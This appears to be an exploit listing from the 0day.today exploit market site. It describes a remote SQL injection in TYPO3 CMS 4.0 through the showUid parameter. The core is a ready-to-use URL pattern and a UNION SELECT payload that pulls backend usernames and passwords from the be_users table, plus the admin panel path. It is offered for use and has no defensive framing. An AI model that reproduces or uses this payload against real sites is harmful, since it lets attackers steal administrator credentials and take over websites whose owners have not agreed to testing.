[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

TYPO3 CMS 4.0 (showUid) Remote SQL Injection Vulnerability

Author
Ro0T-MaFia
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5623
Category
web applications
Date add
05-08-2009
Platform
unsorted
==========================================================
TYPO3 CMS 4.0 (showUid) Remote SQL Injection Vulnerability
==========================================================


#-----
TYPO3 CMS 4.0  SQL-Injection Vulnerability
#-----


 #####################################################
 # [+] Author        :  CyberNaj, JxE-13             #     
 # [+] Vulnerability :  SQL injection                #
 # [+] Group         :  Ro0T-MaFia                   #
 #####################################################

#-----

 Info CMS:

 * Name      : TYPO3
 * Web       : http://typo3.org
 * dowloand  : http://typo3.org/download/packages/      
 * Country   : Venezuela
               
#-----

Vulnerability:

http://www.host.com/index.php?id=[xxx][showUid]=[SQL-injection]&cHash=[xxx]

SQL-injection: -1+union+select+username,2,password,4,5,6,7+from+be_users--

Admin Panel: /typo3/index.php

#-----



#  0day.today [2024-11-16]  #